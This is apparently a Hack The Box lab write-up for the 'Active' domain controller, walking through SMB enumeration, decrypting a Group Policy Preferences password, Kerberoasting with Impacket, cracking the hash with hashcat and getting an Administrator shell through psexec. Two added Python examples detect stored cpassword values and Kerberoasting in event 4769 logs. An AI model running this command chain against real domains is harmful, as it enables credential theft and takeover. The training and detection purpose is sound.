Recon
The first step is to simply check for all open ports. For scanning all ports quickly I prefer rustscan.
rustscan -a [target IP] -u 5000 -- -sC -sV
The main details the scan gives us are:
- Kerberos, RPC and SMB services are running on the device
- The domain controller’s name is ‘active.htb’
Make sure to add that to your /etc/hosts file
Enumeration
First we start by enumerating RPC. As we don't have any creds, we try a null session:
rpcclient -U "" -N [IP]
But we get nothing useful.
Now we try our luck with SMB:
smbmap -H [IP]
We see that we have ‘read only’ access to a share named ‘Replication’
After some painful enumeration, we find a groups.xml file:
smbclient \\\\[ip]\\Replication
Let's download the file and examine its contents:
mget groups.xml
On doing some more research on this file, I come across this webpage…
We learn that we can decrypt the password of user SVC_TGS in the file using the gpp-decrypt tool in Linux.
gpp-decrypt [Encrypted Password]
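The groups.xml finding above is the thing a defender wants to sweep for before anyone else does. The following is an added example, not part of the original writeup: a small Python audit that walks a local copy of SYSVOL (or a mirrored share) and reports every Group Policy Preference item that still carries a cpassword attribute. The embedded groups.xml is constructed, the cpassword value is a placeholder rather than a real ciphertext, and the "helpdesk" item and dates are made up. It only detects; decryption is left to the tool the writeup already names.

```python
"""Added example: audit Group Policy Preference XML for stored cpassword values.

Not part of the original writeup. The sample XML is constructed and the
cpassword value is a placeholder, not a real ciphertext.
"""
import xml.etree.ElementTree as ET
from pathlib import Path

# Attributes that name the account a GPP item sets a password for or runs as
# (groups/drives use userName, scheduled tasks runAs, services accountName,
# data sources username).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

# Constructed sample in the shape of a SYSVOL groups.xml: one User item with a
# stored password (placeholder) and one whose cpassword is empty.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="SVC_TGS"/>
  </User>
  <User name="helpdesk" image="2" changed="2018-07-18 20:50:00">
    <Properties action="U" cpassword="" userName="helpdesk"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element carrying a cpassword attribute.

    has_password is False when the attribute is present but empty, which is
    how GPP records "no password set"; those are noise rather than findings.
    """
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers, so build a child -> parent map once.
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        item = parent_of.get(elem, elem)  # <Properties> sits under the item element
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        findings.append({
            "source": source,
            "element": item.tag,
            "account": account,
            "changed": item.get("changed"),
            "has_password": bool(cpw),
        })
    return findings


def scan_tree(root_dir):
    """Walk a local copy of SYSVOL (or a mirrored share) and scan every XML file."""
    findings = []
    for path in Path(root_dir).rglob("*.xml"):
        try:
            text = path.read_text(encoding="utf-8-sig")  # GPP files often carry a BOM
        except (OSError, UnicodeDecodeError):
            continue
        if "cpassword" not in text:
            continue  # cheap pre-filter before parsing
        try:
            findings.extend(find_cpasswords(text, str(path)))
        except ET.ParseError:
            continue
    return findings


def stored_credentials(findings):
    """Keep only the findings where a password is actually stored."""
    return [f for f in findings if f["has_password"]]


if __name__ == "__main__":
    for f in stored_credentials(find_cpasswords(SAMPLE_GROUPS_XML, "groups.xml")):
        print(f"{f['source']}: {f['element']} item for {f['account']} "
              f"(changed {f['changed']}) stores a cpassword")
```

Run it against a copy of the Policies directory with scan_tree("/path/to/SYSVOL"). The patch Microsoft shipped in MS14-025 stops new passwords being written into GPP, but it does not remove items that were created earlier, which is why a sweep like this still turns up hits; every hit is an account whose password should be rotated and a policy item that should be deleted.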
Exploitation
Even with these creds, we are unable to get a shell.
But with these creds we can check for kerberoastable users using SecureAuthCorp’s Impacket toolkit.
GetUserSPNs.py -dc-ip [ip] active.htb/svc_tgs -request
We now get the Administrator's hash; let's crack it with Hashcat. Looking at the format, we see that the hashcat mode to crack it is 13100.
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
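On the domain controller, the ticket request step above leaves event 4769 ("A Kerberos service ticket was requested") with TicketEncryptionType 0x17 (RC4-HMAC), the same etype 23 that hashcat mode 13100 cracks. The following is an added example, not part of the original writeup: detection logic in Python that runs over 4769 records and alerts when one source host pulls RC4 tickets for several distinct user service accounts in a short window, which is exactly the shape a bulk request produces. The events, timestamps and IP addresses are constructed, and the service names other than SVC_TGS are placeholders.

```python
"""Added example: flag Kerberoasting-style TGS requests in Windows event 4769 data.

Not part of the original writeup. The events below are constructed samples in
the shape of the 4769 EventData fields, not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP; 0x17 is hashcat mode 13100


def _ts(s):
    return datetime.fromisoformat(s)


def _ev(time, service, etype, src="::ffff:10.10.14.5", who="svc_tgs@ACTIVE.HTB"):
    return {"EventID": 4769, "TimeCreated": _ts(time), "TargetUserName": who,
            "ServiceName": service, "IpAddress": src,
            "TicketEncryptionType": etype, "Status": "0x0"}


# Constructed sample: one AES ticket for a machine account, a burst of RC4
# tickets for several user service accounts from one host, a krbtgt ticket,
# and a lone RC4 request from a second host.
SAMPLE_EVENTS = [
    _ev("2018-07-18T21:00:00", "DC$", "0x12"),
    _ev("2018-07-18T21:00:05", "SVC_TGS", "0x17"),
    _ev("2018-07-18T21:00:06", "SVC_SQL", "0x17"),
    _ev("2018-07-18T21:00:07", "SVC_WEB", "0x17"),
    _ev("2018-07-18T21:00:08", "krbtgt", "0x17"),
    _ev("2018-07-18T21:30:00", "SVC_TGS", "0x17", src="::ffff:10.10.14.9", who="bob@ACTIVE.HTB"),
]


def is_rc4_user_tgs(ev):
    """True for a successful RC4 service-ticket request for a non-machine, non-krbtgt service."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    service = ev.get("ServiceName", "")
    if service.lower() == "krbtgt" or service.endswith("$"):
        return False
    return ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES


def kerberoast_alerts(events, window=timedelta(minutes=5), min_services=2):
    """One alert per source host that obtained RC4 tickets for at least
    min_services distinct services inside a sliding time window."""
    by_source = defaultdict(list)
    for ev in events:
        if is_rc4_user_tgs(ev):
            by_source[ev["IpAddress"]].append(ev)
    alerts = []
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:]
                         if e["TimeCreated"] - first["TimeCreated"] <= window]
            services = sorted({e["ServiceName"] for e in in_window})
            if len(services) >= min_services:
                alerts.append({"source": source,
                               "requester": first["TargetUserName"],
                               "services": services,
                               "first_seen": first["TimeCreated"]})
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_EVENTS):
        print(f"{a['first_seen']} {a['source']} ({a['requester']}) pulled RC4 "
              f"tickets for {', '.join(a['services'])}")
```

The single RC4 request from the second host does not alert at the default threshold, which keeps ordinary RC4-only legacy clients out of the queue; lowering min_services to 1 turns the function into a plain RC4 inventory. The durable fix is to make 0x17 disappear from these events for service accounts: long random passwords (or gMSA) so the ticket cannot be cracked, and AES-only msDS-SupportedEncryptionTypes on the account so RC4 tickets are never issued.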
We now get the Administrator account's password. Let's now try to get shell access.
For some reason we can't get a shell with evil-winrm, but we do get one with psexec:
psexec.py active.htb/administrator:[pass]@[ip]
We are now Admin!
The enumeration in this box was a pain for me, but I learnt a lot from it. Hope you enjoyed this writeup.
https://www.hackthebox.eu/home/users/profile/271362
(If you enjoyed this, feel free to hit the respect button; it helps boost my confidence and motivates me to publish more write-ups.)